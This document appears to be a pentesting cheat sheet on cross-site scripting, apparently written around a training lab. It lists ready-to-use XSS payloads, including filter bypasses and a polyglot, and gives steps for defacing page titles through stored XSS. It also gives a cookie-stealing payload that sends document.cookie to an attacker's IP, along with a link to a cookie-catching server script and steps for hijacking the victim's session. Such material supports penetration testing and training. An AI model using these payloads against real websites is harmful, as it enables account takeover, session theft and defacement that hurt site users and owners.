XSS

Payloads

# Standard XSS Payload
<script>alert('XSS');</script>

# Input tag escape
"><script>alert('XSS');</script>

# Escape textarea tag
</textarea><script>alert('XSS');</script>

# Escape Javascript code
';alert('XSS');//

# Bypass filters that strip out malicious words such like "script"
<sscriptcript>alert('XSS');</sscriptcript>

# Polygot payload (Can bypass multiple filters)
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('XSS') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('XSS)//>\x3e

Payload List

https://github.com/payloadbox/xss-payload-list/blob/master/Intruder/xss-payload-list.txtgithub.com

Stored XSS

Defacing HTML Titles

Stored XSS can allow opportunity to deface web applications through various methods. One such method may allow for HTML titles and elements to be changed. In the example below we will be altering the HTML title "XSS playground".

Firstly, we need to identify the Element ID for the title. Using the browser's inspector we can identify the Element ID where we can see the string:

<span id="thm-title">XSS Playground"</span>

As shown in the browser inspector:

The following payload can be used to alter the title. This payload can be inserted into the comment section on the web application.

<script>document.getElementById('thm-title').innerHTML="Defaced";</script>

After the payload has been inserted we can see where the HTML title has now been changed.

Payloads for changing Element ID

<script>document.getElementById('ID').innerHTML="Defaced";</script>
<script>document.querySelector('#ID').textContent = 'Defaced'</script>

Cookie stealing can be performed via Reflected and Stored XSS. With Stored XSS anyone who visits the affected web page can have their cookie sent to an adversary. This cookie can then be used to potentially log into the application as the victims user account.

The script linked below is used to set up a HTTP server on the attackers machine which will catch cookies from an unsuspecting users browser session when they active the stored XSS.

Script: https://raw.githubusercontent.com/lnxg33k/misc/master/XSS-cookie-stealer.py

After the script has been downloaded alter the variables shown below to point back to the attacking system and then run the script with Python.

After the script is setup and running the attacker injects the Stored XSS payload as shown below onto the vulnerable web page.

<script>var i=new Image;i.src="http://<IP>/?"+document.cookie;</script>

When the victim nexts visits the affected web page their cookie will be sent to the attacker.

Where the script receives the cookie:

The cookie is then placed into the attackers browser session.

After a page refresh by the adversary we see they are now logged in as the victim' s user account.

Reflected XSS

Reflected XSS "reflects" the injected script back to the victims browser through various methods such as search functions, forms and as part of script contained within a URL.

Simple payload for proof of concept:

<script>alert('Hello')</script>

The page shown below reflects the search query into the URL of the web application. Using the payload shown above we can see how this is reflected back on the web page.

From above we can also see how this affects the URL for the web page.

http://<IP>/reflected?keyword=%3Cscript%3Ealert%28%27Hello%27%29%3C%2Fscript%3E

Grabbing machine IP

<script>alert(window.location.hostname)</script>

hashtagPayloads

hashtagPayload List

hashtagStored XSS

hashtagDefacing HTML Titles

hashtagPayloads for changing Element ID

hashtagCookie Stealing

hashtagReflected XSS

hashtagGrabbing machine IP

hashtagFurther Reading